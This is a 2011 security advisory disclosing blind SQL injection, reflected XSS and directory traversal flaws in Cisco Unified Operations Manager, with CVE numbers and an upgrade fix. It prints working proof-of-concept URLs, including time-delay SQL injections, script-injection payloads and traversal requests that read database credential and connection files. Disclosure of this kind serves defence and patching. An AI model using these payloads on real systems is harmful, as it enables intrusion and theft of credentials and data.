Sense of Security - Security Advisory - SOS-11-006Release Date.                  18-May-2011Last Update.                   -Vendor Notification Date.      28-Feb-2011Product.                       Cisco Unified Operations Manager                               Common Services Framework Help Servlet                               Common Services Device Center                               CiscoWorks Homepage                               Note: All of the above products are                               included by default in CuOM.Platform.                      Microsoft WindowsAffected versions.             CuOM 8.0 and 8.5 (verified),                               possibly others.Severity Rating.               Medium - LowImpact.                        Database access, cookie and credential                               theft, impersonation, loss of                               confidentiality, local file disclosure,                               information disclosure.Attack Vector.                 Remote with authenticationSolution Status.               Vendor patch (upgrade to CuOM 8.6 as                               advised by Cisco)CVE reference.                 CVE-2011-0959 (CSCtn61716)                               CVE-2011-0960 (CSCtn61716)                               CVE-2011-0961 (CSCto12704)                               CVE-2011-0962 (CSCto12712)                               CVE-2011-0966 (CSCto35577)Details.Cisco Unified Operations Manager (CuOM) is a NMS for voice developed byCisco Systems. Operations Manager monitors and evaluates the currentstatus of both the IP communications infrastructure and the underlyingtransport infrastructure in your network.Multiple vulnerabilities have been identified in Cisco UnifiedOperations Manager and associated products. These vulnerabilitiesinclude multiple blind SQL injections, multiple XSS. and a directorytraversal vulnerability.1. Blind SQL injection vulnerabilities that affect CuOMCVE-2011-0960 (CSCtn61716):The Variable CCMs of PRTestCreation can trigger a blind SQL injectionvulnerability by supplying a single quote, followed by a time delaycall:/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=Additionally, variable ccm of TelePresenceReportAction can trigger ablind SQL injection vulnerability by supplying a single quote:/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--2. Reflected XSS vulnerabilities that affect CuOMCVE-2011-0959 (CSCtn61716):/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7Reflected XSS vulnerability that affect Common Services Device CenterCVE-2011-0962 (CSCto12712):/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987Reflected XSS vulnerability that affects Common Services FrameworkHelp Servlet CVE-2011-0961 (CSCto12704):/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=13. Directory traversal vulnerability that affects CiscoWorks HomepageCVE-2011-0966 (CSCto35577):http://target:1741/cwhp/auditLog.do?file=../../../../../../../boot.inicmfDBA user database info:http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/MDC/Tomcat/webapps/triveni/WEB-INF/classes/schedule.propertiesDB connection info for all databases:http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/lib/classpath/com/cisco/nm/cmf/dbservice2/DBServer.propertiesNote: When reading large files such as this file, ensure the rowlimit is adjusted to 500 for example.DB password change log:http://target:1741/cwhp/auditLog.do?file=../../../../../../../Program Files/CSCOpx/log/dbpwdChange.logSolution.Upgrade to CuOM 8.6. Refer to Cisco Bug IDs: CSCtn61716, CSCto12704, CSCto12712 andCSCto35577 for information on patches and availability of fixes.Discovered by.Sense of Security Labs.About us.Sense of Security is a leading provider of informationsecurity and risk management solutions. Our team has expertskills in assessment and assurance, strategy and architecture,and deployment through to ongoing management. We areAustralia's premier application penetration testing firm andtrusted IT security advisor to many of the countries largestorganisations.Sense of Security Pty Ltd Level 8, 66 King StSydney NSW 2000AUSTRALIAT: +61 (0)2 9290 4444F: +61 (0)2 9290 4455W: http://www.senseofsecurity.com.auE: info@senseofsecurity.com.auTwitter: @ITsecurityAUThe latest version of this advisory can be found at:http://www.senseofsecurity.com.au/advisories/SOS-11-006.pdfOther Sense of Security advisories can be found at:http://www.senseofsecurity.com.au/research/it-security-advisories.php